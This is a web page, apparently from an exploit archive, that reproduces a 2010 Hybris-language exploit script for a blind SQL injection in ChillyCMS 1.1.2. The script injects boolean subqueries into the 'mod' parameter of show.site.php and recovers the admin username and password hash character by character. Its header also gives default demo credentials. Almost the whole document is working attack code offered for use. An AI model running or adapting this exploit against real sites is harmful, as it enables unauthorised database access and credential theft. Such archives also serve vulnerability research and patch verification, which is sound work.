扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 |
#!/usr/bin/hybris ################################################################################# # # Exploit Title: ChillyCMS Blind Sql Injection # Date: 14-05-2010 # Author: IHTeam # Software Link: http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9 # Version: 1.1.2 # Tested on: Win/Linux # # # Example: # [user@user Advisories]$ hybris chillycms.hy # Searching Username... : # admin # Searching MD5... : # d033e22ae348aeb5660fc2140aec35850c4da997 # # # DEFAULT USERNAME AND PASSWORD: # User: jens # Pass: demo # # Thanks to evilsocket for Hybris # http://www.hybris-lang.org/ ################################################################################# import std.*; query1 = "4/**/AND/**/(SELECT/**/SUBSTRING("; query2 = ")/**/FROM/**/system_users/**/limit/**/0,1)=char("; chars = [48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f']; usr = ""; password = ""; i=1; println("Searching Username... : "); while(1) { found=false; chrs = 'a' .. 'z'; foreach(char of chrs) { _chrs = toint(char); url = "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"user,"+i+",1"+query2+_chrs+")"; html = http_get( "http://localhost", url ); if (html ~= "/name='user'/") { usr += char; i+=1; found=true; } } if (!found) { break; } } println(usr); i=1; println("Searching MD5... : "); while(1) { found=false; foreach(char of chars.keys()) { url = "/chillyCMS/core/show.site.php?editprofile&mod="+query1+"pw,"+i+",1"+query2+char+")"; html = http_get( "http://localhost", url ); if (html ~= "/name='user'/") { password += chars[char]; i+=1; found=true; } } if (!found) { break; } } println(password); println(); |
体验盒子
